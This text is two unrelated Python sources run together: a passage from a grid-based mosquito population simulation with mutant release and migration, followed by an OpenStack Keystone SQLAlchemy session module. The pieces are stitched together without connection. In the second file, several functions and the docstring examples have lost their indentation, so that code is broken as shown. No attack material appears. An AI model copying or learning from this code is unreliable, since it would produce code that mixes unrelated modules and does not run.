        for stage in ('e', 'l', 'p', 'ah', 'ar', 'ao', 'amale',
                      'emut', 'lmut', 'pmut', 'amut'):
            if getattr(self, stage) < 0:
                setattr(self, stage, 0)
        self.pop_list = np.array([self.e, self.l, self.p, self.ah, self.ar, self.ao])
        self.n_total = self.pop_list.sum()
        self.n_aquatic = sum(self.pop_list[0:3])
        self.n_adult = sum(self.pop_list[3:])
class Grid:
    """2-D lattice of :class:`Cell` objects driving the spatial simulation:
    per-day population dynamics plus neighbor-to-neighbor migration of the
    mobile adult stages, with plotting helpers for timelapse output.

    Bug fixed in :meth:`update_migration`: the low-attractiveness fallback
    branch for ovoposition-seeking adults accumulated into ``updatedah``
    (host-seekers) instead of ``updatedao``, double-counting host-seekers
    and silently dropping those migrants.
    """

    def __init__(self, contour, vegimage, twiimage, cityimage, pixelXmeters, larvaelim, gmotype, eqsteps):
        """Build the cell grid and migration weight tables, then run
        ``eqsteps`` warm-up days so the population starts at equilibrium.

        :param contour: binary water mask (1 = water)
        :param vegimage: vegetation index image (host-seeking attractiveness)
        :param twiimage: wetness index image (ovoposition attractiveness)
        :param cityimage: land-use / vegetation-type image
        :param pixelXmeters: pixel edge length in meters
        :param larvaelim: larvae carrying capacity per square km
        :param gmotype: mutant fitness multiplier forwarded to each Cell
        :param eqsteps: number of warm-up days before time zero
        """
        self.internalclock = 0
        self.shape = contour.shape
        self.contour = contour
        # invert so that larger values mean "more attractive" to migrants
        self.vegimage = abs(vegimage-1)
        self.twiimage = abs(twiimage-1)
        self.cityimage = cityimage
        self.pixelSize = pixelXmeters
        self.history = []
        # build the migration dictionaries
        self.maxstep = MaxStep(pixelXmeters)
        print("migration dt = "+ str(self.maxstep/60))
        self.dict_matrix_to_num, self.dict_num_to_weights = weightDictmaker(self.maxstep, 10000,pixelXmeters)
        # calculate stable population values by iterating a reference cell
        stable = Cell(np.array([100,100,100,100,100,100]),1,self.vegimage.mean(),self.twiimage.mean(),1, pixelXmeters, larvaelim, gmotype)
        for i in range(300): stable.update()
        print("initializing population with: ")
        print(stable.pop_list)
        # initialize grid of Cells; water pixels (contour == 1) start empty
        self.GRID = [[Cell(np.array(stable.pop_list)*abs(1-contour[j][i]), cityimage[j][i], vegimage[j][i], twiimage[j][i], contour[j][i], pixelXmeters, larvaelim, gmotype) for i in range(self.shape[1])] for j in range(self.shape[0])]
        print()
        # encode each interior pixel's 8-neighborhood water pattern as a
        # tuple so it can be looked up in the migration-weight dictionary
        def neighbors_to_tuple(y,x):
            return(int(contour[y-1,x-1]), int(contour[y,x-1]), int(contour[y+1,x-1]), int(contour[y-1,x]), int(contour[y+1,x]), int(contour[y-1,x+1]), int(contour[y,x+1]), int(contour[y+1,x+1]))
        self.bordertype = [[self.dict_matrix_to_num[neighbors_to_tuple(j,i)] for i in range(1,self.shape[1]-1)] for j in range(1,self.shape[0]-1)]
        self.bordertype = np.pad(self.bordertype, pad_width=((1,1),(1,1)), mode='constant', constant_values=-1)  # pad border with sentinel -1
        # warm up: let population and migration reach equilibrium
        for i in range(eqsteps):
            self.updateall()
        self.internalclock = 0
        self.history = []
        print("equilized population")
        print("equilized migration")
        # color-scale maxima for the timelapse plots
        self.maxafem = self.getSingleGrid("adult").max()
        self.maxmut = self.getSingleGrid("amut").max()
        self.maxaqua = self.getSingleGrid("aqua").max() + self.getSingleGrid("aquamut").max()

    def getSingleGrid(self, ending):
        """Return one population layer as a 2-D numpy array.

        :param ending: layer name -- a single stage ('e', 'l', 'p', 'ah',
            'ar', 'ao', 'amale', 'amut'), or an aggregate ('aqua', 'adult',
            'all', 'aquamut')
        """
        if ending == "e" : return np.array([[self.GRID[j][i].e for i in range(self.shape[1])] for j in range(self.shape[0])])
        if ending == "l" : return np.array([[self.GRID[j][i].l for i in range(self.shape[1])] for j in range(self.shape[0])])
        if ending == "p" : return np.array([[self.GRID[j][i].p for i in range(self.shape[1])] for j in range(self.shape[0])])
        if ending == "ah" : return np.array([[self.GRID[j][i].ah for i in range(self.shape[1])] for j in range(self.shape[0])])
        if ending == "ar" : return np.array([[self.GRID[j][i].ar for i in range(self.shape[1])] for j in range(self.shape[0])])
        if ending == "ao" : return np.array([[self.GRID[j][i].ao for i in range(self.shape[1])] for j in range(self.shape[0])])
        if ending == "aqua" : return self.getSingleGrid("e") + self.getSingleGrid("l") + self.getSingleGrid("p")
        if ending == "adult": return self.getSingleGrid("ah") + self.getSingleGrid("ar")+ self.getSingleGrid("ao")
        if ending == "all" : return self.getSingleGrid("aqua")+ self.getSingleGrid("adult")
        if ending == "amale": return np.array([[self.GRID[j][i].amale for i in range(self.shape[1])] for j in range(self.shape[0])])
        if ending == "amut" : return np.array([[self.GRID[j][i].amut for i in range(self.shape[1])] for j in range(self.shape[0])])
        if ending == "aquamut": return np.array([[self.GRID[j][i].emut+self.GRID[j][i].lmut+self.GRID[j][i].pmut for i in range(self.shape[1])] for j in range(self.shape[0])])
        print("wrong command on getSingleGrid"); return np.array([[]])

    def grdsum(self, ending):
        """Total population of the given layer over the whole grid."""
        grid_to_sum = self.getSingleGrid(ending)
        return grid_to_sum.sum()

    def update_pop(self):
        """Run the per-cell population update on every cell."""
        [[self.GRID[j][i].update() for i in range(self.shape[1])] for j in range(self.shape[0])]

    def update_migration(self):
        """Move mobile adults (ah, ao, amale, amut) between neighboring
        cells using the precomputed border weight matrices; ah migrants are
        steered by vegetation, ao migrants by wetness."""
        updatedah = np.zeros(self.shape)
        updatedao = np.zeros(self.shape)
        updatedamale = np.zeros(self.shape)
        updatedamut = np.zeros(self.shape)
        for i in range(1, self.shape[0]-1):
            for j in range(1, self.shape[1]-1):
                if self.GRID[i][j].iswater == 0:
                    borderMatrix = np.array(self.dict_num_to_weights[self.bordertype[i][j]])
                    # host-seekers are attracted by vegetation
                    floatingah = self.GRID[i][j].ah * borderMatrix * self.vegimage[i-1:i+2,j-1:j+2]
                    if floatingah.sum() > 0.05:
                        updatedah[i-1:i+2,j-1:j+2] += floatingah*(self.GRID[i][j].ah/floatingah.sum())
                    else: updatedah[i-1:i+2,j-1:j+2] += self.GRID[i][j].ah * borderMatrix
                    # ovoposition-seekers are attracted by wetness
                    floatingao = self.GRID[i][j].ao * borderMatrix * self.twiimage[i-1:i+2,j-1:j+2]
                    if floatingao.sum() > 0.05:
                        updatedao[i-1:i+2,j-1:j+2] += floatingao*(self.GRID[i][j].ao/floatingao.sum())
                    else:
                        # BUG FIX: this fallback originally accumulated into
                        # updatedah, losing these ao migrants entirely
                        updatedao[i-1:i+2,j-1:j+2] += self.GRID[i][j].ao * borderMatrix
                    updatedamale[i-1:i+2,j-1:j+2] += self.GRID[i][j].amale * borderMatrix
                    updatedamut[i-1:i+2,j-1:j+2] += self.GRID[i][j].amut * borderMatrix
        for i in range(1, self.shape[0]-1):
            for j in range(1, self.shape[1]-1):
                self.GRID[i][j].ah = updatedah[i][j]
                self.GRID[i][j].ao = updatedao[i][j]
                self.GRID[i][j].amale = updatedamale[i][j]
                self.GRID[i][j].amut = updatedamut[i][j]

    def updateall(self):
        """Advance the whole grid by one day: as many migration sub-steps
        as fit in 24h at the migration timestep, then one population step,
        then record totals in the history."""
        for i in range(int(24*60/self.maxstep)):
            self.update_migration()
        self.update_pop()
        self.internalclock += 1
        self.history += [(self.grdsum("adult"),self.grdsum("amut") )]

    def images(self):
        """Save a three-panel snapshot (aquatic stages, mutant males, adult
        females) to timelapse/timelapse-<day>.png."""
        f, (aquatics, ao, adults) = plt.subplots(ncols=3, figsize=(10,5))
        caq = aquatics.imshow(self.getSingleGrid('aqua') + self.getSingleGrid('aquamut'), cmap=plt.get_cmap("gist_earth"), vmin = 0, vmax = .8*self.maxaqua)
        aquatics.set_title('Aquatics stages')
        divider1 = make_axes_locatable(aquatics)
        cax1 = divider1.append_axes("bottom", size="5%", pad=0.05)
        f.colorbar(caq,cax1,orientation="horizontal")
        cao=ao.imshow(self.getSingleGrid('amut'), cmap=plt.get_cmap("gist_earth"), vmin = 0, vmax = self.maxafem/.9)
        ao.set_title('Mutant males')
        divider3 = make_axes_locatable(ao)
        cax3 = divider3.append_axes("bottom", size="5%", pad=0.05)
        f.colorbar(cao,cax3, orientation="horizontal")
        caa=adults.imshow(self.getSingleGrid('adult'), cmap=plt.get_cmap("gist_earth"), vmin = 0, vmax = self.maxafem)
        adults.set_title('Adult females')
        divider4 = make_axes_locatable(adults)
        cax4 = divider4.append_axes("bottom", size="5%", pad=0.05)
        f.colorbar(caa,cax4, orientation="horizontal")
        f.subplots_adjust(hspace=0)
        f.suptitle(str(self.internalclock)+" days after release", size = 17)
        plt.setp([a.get_xticklabels() for a in f.axes[:-3]], visible=False)
        plt.setp([a.get_yticklabels() for a in f.axes[:]], visible=False)
        f.tight_layout()
        f.subplots_adjust(top = 0.999)
        plt.savefig("timelapse/timelapse-"+ '{0:03d}'.format(self.internalclock)+".png")
        plt.close()

    def graph(self):
        """Save the population-size and frequency time-series plots built
        from the recorded history."""
        femalehist, muthist = zip(*self.history)
        f, (graph1) = plt.subplots(ncols=1)
        graph1.plot(range(self.internalclock), femalehist , label = "females")
        graph1.plot(range(self.internalclock), muthist , label = "mutants")
        plt.xlabel('days after mutant release')
        plt.ylabel('population size per square Km')
        graph1.set_title('variation in population size ')
        plt.legend(loc='best', prop={'size':10})
        plt.savefig("timelapse/popsize_variation.png")
        plt.close()
        f, (graph2) = plt.subplots(ncols=1)
        graph2.plot(range(self.internalclock), [femalehist[i]/(2*femalehist[i] + muthist[i]) for i in range(self.internalclock)], label = "females frequency")
        graph2.plot( range(self.internalclock),[muthist[i]/(2*femalehist[i] + muthist[i]) for i in range(self.internalclock)], label = "mutant frequency")
        plt.xlabel('days after mutant release')
        plt.ylabel('percentages')
        plt.ylim(0,1)
        graph2.set_title('mutant and female percentages after release')
        plt.legend(loc='best', prop={'size':10})
        plt.savefig("timelapse/frequency_variation.png")
        plt.close()
| |
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Session Handling for SQLAlchemy backend.
Initializing:
* Call set_defaults with the minimal of the following kwargs:
sql_connection, sqlite_db
Example::
session.set_defaults(
sql_connection="sqlite:///var/lib/keystone/sqlite.db",
sqlite_db="/var/lib/keystone/sqlite.db")
Recommended ways to use sessions within this framework:
* Don't use them explicitly; this is like running with AUTOCOMMIT=1.
model_query() will implicitly use a session when called without one
supplied. This is the ideal situation because it will allow queries
to be automatically retried if the database connection is interrupted.
Note: Automatic retry will be enabled in a future patch.
It is generally fine to issue several queries in a row like this. Even though
they may be run in separate transactions and/or separate sessions, each one
will see the data from the prior calls. If needed, undo- or rollback-like
functionality should be handled at a logical level. For an example, look at
the code around quotas and reservation_rollback().
Examples::
def get_foo(context, foo):
return (model_query(context, models.Foo).
filter_by(foo=foo).
first())
def update_foo(context, id, newfoo):
(model_query(context, models.Foo).
filter_by(id=id).
update({'foo': newfoo}))
def create_foo(context, values):
foo_ref = models.Foo()
foo_ref.update(values)
foo_ref.save()
return foo_ref
* Within the scope of a single method, keeping all the reads and writes within
the context managed by a single session. In this way, the session's __exit__
handler will take care of calling flush() and commit() for you.
If using this approach, you should not explicitly call flush() or commit().
Any error within the context of the session will cause the session to emit
a ROLLBACK. Database Errors like IntegrityError will be raised in
session's __exit__ handler, and any try/except within the context managed
by session will not be triggered. And catching other non-database errors in
the session will not trigger the ROLLBACK, so exception handlers should
always be outside the session, unless the developer wants to do a partial
commit on purpose. If the connection is dropped before this is possible,
the database will implicitly roll back the transaction.
Note: statements in the session scope will not be automatically retried.
If you create models within the session, they need to be added, but you
do not need to call model.save()
  ::
def create_many_foo(context, foos):
session = get_session()
with session.begin():
for foo in foos:
foo_ref = models.Foo()
foo_ref.update(foo)
session.add(foo_ref)
def update_bar(context, foo_id, newbar):
session = get_session()
with session.begin():
foo_ref = (model_query(context, models.Foo, session).
filter_by(id=foo_id).
first())
(model_query(context, models.Bar, session).
filter_by(id=foo_ref['bar_id']).
update({'bar': newbar}))
Note: update_bar is a trivially simple example of using "with session.begin".
Whereas create_many_foo is a good example of when a transaction is needed,
it is always best to use as few queries as possible. The two queries in
update_bar can be better expressed using a single query which avoids
the need for an explicit transaction. It can be expressed like so::
def update_bar(context, foo_id, newbar):
subq = (model_query(context, models.Foo.id).
filter_by(id=foo_id).
limit(1).
subquery())
(model_query(context, models.Bar).
filter_by(id=subq.as_scalar()).
update({'bar': newbar}))
For reference, this emits approximately the following SQL statement::
UPDATE bar SET bar = ${newbar}
WHERE id=(SELECT bar_id FROM foo WHERE id = ${foo_id} LIMIT 1);
Note: create_duplicate_foo is a trivially simple example of catching an
exception while using "with session.begin". Here we create two instances
with the same primary key; the exception must be caught outside the
context managed by the session:
def create_duplicate_foo(context):
foo1 = models.Foo()
foo2 = models.Foo()
foo1.id = foo2.id = 1
session = get_session()
try:
with session.begin():
session.add(foo1)
session.add(foo2)
except exception.DBDuplicateEntry as e:
handle_error(e)
* Passing an active session between methods. Sessions should only be passed
to private methods. The private method must use a subtransaction; otherwise
SQLAlchemy will throw an error when you call session.begin() on an existing
transaction. Public methods should not accept a session parameter and should
not be involved in sessions within the caller's scope.
Note that this incurs more overhead in SQLAlchemy than the above means
due to nesting transactions, and it is not possible to implicitly retry
failed database operations when using this approach.
This also makes code somewhat more difficult to read and debug, because a
single database transaction spans more than one method. Error handling
becomes less clear in this situation. When this is needed for code clarity,
it should be clearly documented.
::
def myfunc(foo):
session = get_session()
with session.begin():
# do some database things
bar = _private_func(foo, session)
return bar
def _private_func(foo, session=None):
if not session:
session = get_session()
with session.begin(subtransaction=True):
# do some other database things
return bar
There are some things which it is best to avoid:
* Don't keep a transaction open any longer than necessary.
This means that your "with session.begin()" block should be as short
as possible, while still containing all the related calls for that
transaction.
* Avoid "with_lockmode('UPDATE')" when possible.
In MySQL/InnoDB, when a "SELECT ... FOR UPDATE" query does not match
any rows, it will take a gap-lock. This is a form of write-lock on the
"gap" where no rows exist, and prevents any other writes to that space.
This can effectively prevent any INSERT into a table by locking the gap
at the end of the index. Similar problems will occur if the SELECT FOR UPDATE
has an overly broad WHERE clause, or doesn't properly use an index.
One idea proposed at ODS Fall '12 was to use a normal SELECT to test the
number of rows matching a query, and if only one row is returned,
then issue the SELECT FOR UPDATE.
The better long-term solution is to use INSERT .. ON DUPLICATE KEY UPDATE.
However, this can not be done until the "deleted" columns are removed and
proper UNIQUE constraints are added to the tables.
Enabling soft deletes:
* To use/enable soft-deletes, the SoftDeleteMixin must be added
to your model class. For example::
class NovaBase(models.SoftDeleteMixin, models.ModelBase):
pass
Efficient use of soft deletes:
* There are two possible ways to mark a record as deleted::
model.soft_delete() and query.soft_delete().
model.soft_delete() method works with single already fetched entry.
query.soft_delete() makes only one db request for all entries that correspond
to query.
* In almost all cases you should use query.soft_delete(). Some examples::
def soft_delete_bar():
count = model_query(BarModel).find(some_condition).soft_delete()
if count == 0:
raise Exception("0 entries were soft deleted")
def complex_soft_delete_with_synchronization_bar(session=None):
if session is None:
session = get_session()
with session.begin(subtransactions=True):
count = (model_query(BarModel).
find(some_condition).
soft_delete(synchronize_session=True))
# Here synchronize_session is required, because we
# don't know what is going on in outer session.
if count == 0:
raise Exception("0 entries were soft deleted")
* There is only one situation where model.soft_delete() is appropriate: when
you fetch a single record, work with it, and mark it as deleted in the same
transaction.
::
def soft_delete_bar_model():
session = get_session()
with session.begin():
bar_ref = model_query(BarModel).find(some_condition).first()
# Work with bar_ref
bar_ref.soft_delete(session=session)
However, if you need to work with all entries that correspond to query and
then soft delete them you should use query.soft_delete() method::
def soft_delete_multi_models():
session = get_session()
with session.begin():
query = (model_query(BarModel, session=session).
find(some_condition))
model_refs = query.all()
# Work with model_refs
query.soft_delete(synchronize_session=False)
# synchronize_session=False should be set if there is no outer
# session and these entries are not used after this.
When working with many rows, it is very important to use query.soft_delete,
which issues a single query. Using model.soft_delete(), as in the following
example, is very inefficient.
::
for bar_ref in bar_refs:
bar_ref.soft_delete(session=session)
# This will produce count(bar_refs) db requests.
"""
import functools
import os.path
import re
import time
from oslo.config import cfg
import six
from sqlalchemy import exc as sqla_exc
from sqlalchemy.interfaces import PoolListener
import sqlalchemy.orm
from sqlalchemy.pool import NullPool, StaticPool
from sqlalchemy.sql.expression import literal_column
from keystone.openstack.common.db import exception
from keystone.openstack.common.gettextutils import _
from keystone.openstack.common import log as logging
from keystone.openstack.common import timeutils
# Options controlling the SQLite backend; registered in the DEFAULT group
# by CONF.register_opts(sqlite_db_opts) below.
sqlite_db_opts = [
    cfg.StrOpt('sqlite_db',
               default='keystone.sqlite',
               help='the filename to use with sqlite'),
    cfg.BoolOpt('sqlite_synchronous',
                default=True,
                help='If true, use synchronous mode for sqlite'),
]
# Options for the primary (and optional read-slave) database connection;
# registered below under the [database] group.  Most options carry
# deprecated aliases so legacy DEFAULT / DATABASE / sql group settings
# keep working.
database_opts = [
    cfg.StrOpt('connection',
               default='sqlite:///' +
                       os.path.abspath(os.path.join(os.path.dirname(__file__),
                                                    '../', '$sqlite_db')),
               help='The SQLAlchemy connection string used to connect to the '
                    'database',
               secret=True,
               deprecated_opts=[cfg.DeprecatedOpt('sql_connection',
                                                  group='DEFAULT'),
                                cfg.DeprecatedOpt('sql_connection',
                                                  group='DATABASE'),
                                cfg.DeprecatedOpt('connection',
                                                  group='sql'), ]),
    cfg.StrOpt('slave_connection',
               default='',
               secret=True,
               help='The SQLAlchemy connection string used to connect to the '
                    'slave database'),
    cfg.IntOpt('idle_timeout',
               default=3600,
               deprecated_opts=[cfg.DeprecatedOpt('sql_idle_timeout',
                                                  group='DEFAULT'),
                                cfg.DeprecatedOpt('sql_idle_timeout',
                                                  group='DATABASE'),
                                cfg.DeprecatedOpt('idle_timeout',
                                                  group='sql')],
               help='timeout before idle sql connections are reaped'),
    cfg.IntOpt('min_pool_size',
               default=1,
               deprecated_opts=[cfg.DeprecatedOpt('sql_min_pool_size',
                                                  group='DEFAULT'),
                                cfg.DeprecatedOpt('sql_min_pool_size',
                                                  group='DATABASE')],
               help='Minimum number of SQL connections to keep open in a '
                    'pool'),
    cfg.IntOpt('max_pool_size',
               default=None,
               deprecated_opts=[cfg.DeprecatedOpt('sql_max_pool_size',
                                                  group='DEFAULT'),
                                cfg.DeprecatedOpt('sql_max_pool_size',
                                                  group='DATABASE')],
               help='Maximum number of SQL connections to keep open in a '
                    'pool'),
    cfg.IntOpt('max_retries',
               default=10,
               deprecated_opts=[cfg.DeprecatedOpt('sql_max_retries',
                                                  group='DEFAULT'),
                                cfg.DeprecatedOpt('sql_max_retries',
                                                  group='DATABASE')],
               help='maximum db connection retries during startup. '
                    '(setting -1 implies an infinite retry count)'),
    cfg.IntOpt('retry_interval',
               default=10,
               deprecated_opts=[cfg.DeprecatedOpt('sql_retry_interval',
                                                  group='DEFAULT'),
                                cfg.DeprecatedOpt('reconnect_interval',
                                                  group='DATABASE')],
               help='interval between retries of opening a sql connection'),
    cfg.IntOpt('max_overflow',
               default=None,
               deprecated_opts=[cfg.DeprecatedOpt('sql_max_overflow',
                                                  group='DEFAULT'),
                                cfg.DeprecatedOpt('sqlalchemy_max_overflow',
                                                  group='DATABASE')],
               help='If set, use this value for max_overflow with sqlalchemy'),
    cfg.IntOpt('connection_debug',
               default=0,
               deprecated_opts=[cfg.DeprecatedOpt('sql_connection_debug',
                                                  group='DEFAULT')],
               help='Verbosity of SQL debugging information. 0=None, '
                    '100=Everything'),
    cfg.BoolOpt('connection_trace',
                default=False,
                deprecated_opts=[cfg.DeprecatedOpt('sql_connection_trace',
                                                   group='DEFAULT')],
                help='Add python stack traces to SQL as comment strings'),
    cfg.IntOpt('pool_timeout',
               default=None,
               deprecated_opts=[cfg.DeprecatedOpt('sqlalchemy_pool_timeout',
                                                  group='DATABASE')],
               help='If set, use this value for pool_timeout with sqlalchemy'),
]
CONF = cfg.CONF
CONF.register_opts(sqlite_db_opts)
CONF.register_opts(database_opts, 'database')

LOG = logging.getLogger(__name__)

# Module-level caches for the lazily created engine and sessionmaker.
# Populated by get_engine()/get_session() and reset by cleanup().
_ENGINE = None
_MAKER = None
# Separate caches for the optional read-slave connection.
_SLAVE_ENGINE = None
_SLAVE_MAKER = None
def set_defaults(sql_connection, sqlite_db, max_pool_size=None,
                 max_overflow=None, pool_timeout=None):
    """Set defaults for configuration variables.

    :param sql_connection: default SQLAlchemy connection URI
    :param sqlite_db: default sqlite database filename
    :param max_pool_size: optional QueuePool size default
    :param max_overflow: optional QueuePool overflow default
    :param pool_timeout: optional QueuePool timeout default
    """
    cfg.set_defaults(database_opts, connection=sql_connection)
    cfg.set_defaults(sqlite_db_opts, sqlite_db=sqlite_db)
    # Update the QueuePool defaults, but only for values the caller
    # explicitly supplied.
    for option_name, override in (('max_pool_size', max_pool_size),
                                  ('max_overflow', max_overflow),
                                  ('pool_timeout', pool_timeout)):
        if override is not None:
            cfg.set_defaults(database_opts, **{option_name: override})
def cleanup():
    """Close all cached sessions and dispose of both engines.

    Resets the module-level caches so the next call to get_session() or
    get_engine() rebuilds everything from scratch.
    """
    global _ENGINE, _MAKER
    global _SLAVE_ENGINE, _SLAVE_MAKER

    maker = _MAKER
    if maker:
        maker.close_all()
        _MAKER = None
    engine = _ENGINE
    if engine:
        engine.dispose()
        _ENGINE = None
    slave_maker = _SLAVE_MAKER
    if slave_maker:
        slave_maker.close_all()
        _SLAVE_MAKER = None
    slave_engine = _SLAVE_ENGINE
    if slave_engine:
        slave_engine.dispose()
        _SLAVE_ENGINE = None
class SqliteForeignKeysListener(PoolListener):
    """Ensures that the foreign key constraints are enforced in SQLite.

    The foreign key constraints are disabled by default in SQLite,
    so the foreign key constraints will be enabled here for every
    database connection
    """

    def connect(self, dbapi_con, con_record):
        # Invoked by the pool for each new DB-API connection; the PRAGMA
        # is per-connection in SQLite, hence it must run here every time.
        dbapi_con.execute('pragma foreign_keys=ON')
def get_session(autocommit=True, expire_on_commit=False, sqlite_fk=False,
                slave_session=False, mysql_traditional_mode=False):
    """Create a new SQLAlchemy session from the cached sessionmaker.

    The sessionmaker (and the engine behind it) is built lazily on first
    use; a separate one is cached for the slave connection when
    slave_session is True.
    """
    global _MAKER
    global _SLAVE_MAKER

    factory = _SLAVE_MAKER if slave_session else _MAKER
    if factory is None:
        # First use: build the engine and sessionmaker.
        engine = get_engine(sqlite_fk=sqlite_fk, slave_engine=slave_session,
                            mysql_traditional_mode=mysql_traditional_mode)
        factory = get_maker(engine, autocommit, expire_on_commit)

    # Cache the (possibly just-built) factory for subsequent calls.
    if slave_session:
        _SLAVE_MAKER = factory
    else:
        _MAKER = factory

    return factory()
# note(boris-42): In current versions of DB backends unique constraint
# violation messages follow the structure:
#
# sqlite:
# 1 column - (IntegrityError) column c1 is not unique
# N columns - (IntegrityError) column c1, c2, ..., N are not unique
#
# sqlite since 3.7.16:
# 1 column - (IntegrityError) UNIQUE constraint failed: k1
#
# N columns - (IntegrityError) UNIQUE constraint failed: k1, k2
#
# postgres:
# 1 column - (IntegrityError) duplicate key value violates unique
# constraint "users_c1_key"
# N columns - (IntegrityError) duplicate key value violates unique
# constraint "name_of_our_constraint"
#
# mysql:
# 1 column - (IntegrityError) (1062, "Duplicate entry 'value_of_c1' for key
# 'c1'")
# N columns - (IntegrityError) (1062, "Duplicate entry 'values joined
# with -' for key 'name_of_our_constraint'")
# Per-backend regexes that extract the offending column list from a
# unique-constraint IntegrityError message (message formats are documented
# in the comment block above).  sqlite gets two patterns because the
# message format changed in sqlite 3.7.16.
_DUP_KEY_RE_DB = {
    "sqlite": (re.compile(r"^.*columns?([^)]+)(is|are)\s+not\s+unique$"),
               re.compile(r"^.*UNIQUE\s+constraint\s+failed:\s+(.+)$")),
    "postgresql": (re.compile(r"^.*duplicate\s+key.*\"([^\"]+)\"\s*\n.*$"),),
    "mysql": (re.compile(r"^.*\(1062,.*'([^\']+)'\"\)$"),)
}
def _raise_if_duplicate_entry_error(integrity_error, engine_name):
    """Raise exception if two entries are duplicated.

    In this function will be raised DBDuplicateEntry exception if integrity
    error wrap unique constraint violation.
    """
    def get_columns_from_uniq_cons_or_name(columns):
        # note(vsergeyev): UniqueConstraint name convention: "uniq_t0c10c2"
        #                  where `t` it is table name and columns `c1`, `c2`
        #                  are in UniqueConstraint.
        uniqbase = "uniq_"
        if not columns.startswith(uniqbase):
            if engine_name == "postgresql":
                # Strip the postgres "<table>_<column>_key" wrapper to get
                # just the column name.
                return [columns[columns.index("_") + 1:columns.rindex("_")]]
            return [columns]
        return columns[len(uniqbase):].split("0")[1:]

    if engine_name not in ["mysql", "sqlite", "postgresql"]:
        # Unknown backend: the message cannot be parsed, so leave the
        # original IntegrityError for the caller's generic handling.
        return

    # FIXME(johannes): The usage of the .message attribute has been
    # deprecated since Python 2.6. However, the exceptions raised by
    # SQLAlchemy can differ when using unicode() and accessing .message.
    # An audit across all three supported engines will be necessary to
    # ensure there are no regressions.
    for pattern in _DUP_KEY_RE_DB[engine_name]:
        match = pattern.match(integrity_error.message)
        if match:
            break
    else:
        # No pattern matched: this is not a unique-constraint violation.
        return

    columns = match.group(1)

    if engine_name == "sqlite":
        columns = columns.strip().split(", ")
    else:
        columns = get_columns_from_uniq_cons_or_name(columns)
    raise exception.DBDuplicateEntry(columns, integrity_error)
# NOTE(comstud): In current versions of DB backends, Deadlock violation
# messages follow the structure:
#
# mysql:
# (OperationalError) (1213, 'Deadlock found when trying to get lock; try '
# 'restarting transaction') <query_str> <query_args>
_DEADLOCK_RE_DB = {
"mysql": re.compile(r"^.*\(1213, 'Deadlock.*")
}
def _raise_if_deadlock_error(operational_error, engine_name):
"""Raise exception on deadlock condition.
Raise DBDeadlock exception if OperationalError contains a Deadlock
condition.
"""
re = _DEADLOCK_RE_DB.get(engine_name)
if re is None:
return
# FIXME(johannes): The usage of the .message attribute has been
# deprecated since Python 2.6. However, the exceptions raised by
# SQLAlchemy can differ when using unicode() and accessing .message.
# An audit across all three supported engines will be necessary to
# ensure there are no regressions.
m = re.match(operational_error.message)
if not m:
return
raise exception.DBDeadlock(operational_error)
def _wrap_db_error(f):
    """Decorator translating SQLAlchemy exceptions into this module's errors.

    UnicodeEncodeError -> DBInvalidUnicodeParameter; IntegrityError ->
    DBDuplicateEntry (for unique-constraint violations) or DBError;
    OperationalError -> DBDeadlock on deadlocks, otherwise re-raised as-is;
    anything else -> DBError.
    """
    @functools.wraps(f)
    def _wrap(*args, **kwargs):
        try:
            return f(*args, **kwargs)
        except UnicodeEncodeError:
            raise exception.DBInvalidUnicodeParameter()
        # note(boris-42): We should catch unique constraint violation and
        #                 wrap it by our own DBDuplicateEntry exception.
        #                 Unique constraint violation is wrapped by
        #                 IntegrityError.
        except sqla_exc.OperationalError as e:
            _raise_if_deadlock_error(e, get_engine().name)
            # NOTE(comstud): A lot of code is checking for OperationalError
            # so let's not wrap it for now.
            raise
        except sqla_exc.IntegrityError as e:
            # note(boris-42): SqlAlchemy doesn't unify errors from different
            #                 DBs so we must do this. Also in some tables
            #                 (for example instance_types) there are more
            #                 than one unique constraint. This means we
            #                 should get names of columns, which values
            #                 violate unique constraint, from error message.
            _raise_if_duplicate_entry_error(e, get_engine().name)
            raise exception.DBError(e)
        except Exception as e:
            LOG.exception(_('DB exception wrapped.'))
            raise exception.DBError(e)
    return _wrap
def get_engine(sqlite_fk=False, slave_engine=False,
               mysql_traditional_mode=False):
    """Return the cached SQLAlchemy engine, creating it on first use.

    When slave_engine is True, the separately cached engine for the
    slave connection URI is used instead of the primary one.
    """
    global _ENGINE
    global _SLAVE_ENGINE

    if slave_engine:
        cached = _SLAVE_ENGINE
        db_uri = CONF.database.slave_connection
    else:
        cached = _ENGINE
        db_uri = CONF.database.connection

    if cached is None:
        cached = create_engine(db_uri, sqlite_fk=sqlite_fk,
                               mysql_traditional_mode=mysql_traditional_mode)
        # Remember the freshly built engine for subsequent calls.
        if slave_engine:
            _SLAVE_ENGINE = cached
        else:
            _ENGINE = cached

    return cached
def _synchronous_switch_listener(dbapi_conn, connection_rec):
"""Switch sqlite connections to non-synchronous mode."""
dbapi_conn.execute("PRAGMA synchronous = OFF")
def _add_regexp_listener(dbapi_con, con_record):
"""Add REGEXP function to sqlite connections."""
def regexp(expr, item):
reg = re.compile(expr)
return reg.search(six.text_type(item)) is not None
dbapi_con.create_function('regexp', 2, regexp)
def _thread_yield(dbapi_con, con_record):
"""Ensure other greenthreads get a chance to be executed.
If we use eventlet.monkey_patch(), eventlet.greenthread.sleep(0) will
execute instead of time.sleep(0).
Force a context switch. With common database backends (eg MySQLdb and
sqlite), there is no implicit yield caused by network I/O since they are
implemented by C libraries that eventlet cannot monkey patch.
"""
time.sleep(0)
def _ping_listener(engine, dbapi_conn, connection_rec, connection_proxy):
    """Ensures that MySQL and DB2 connections are alive.

    Borrowed from:
    http://groups.google.com/group/sqlalchemy/msg/a4ce563d802c929f
    """
    cursor = dbapi_conn.cursor()
    try:
        ping_sql = 'select 1'
        if engine.name == 'ibm_db_sa':
            # DB2 requires a table expression
            ping_sql = 'select 1 from (values (1)) AS t1'
        cursor.execute(ping_sql)
    except Exception as ex:
        if engine.dialect.is_disconnect(ex, dbapi_conn, cursor):
            # Raising DisconnectionError tells the pool to discard this
            # connection and retry with a fresh one.
            msg = _('Database server has gone away: %s') % ex
            LOG.warning(msg)
            raise sqla_exc.DisconnectionError(msg)
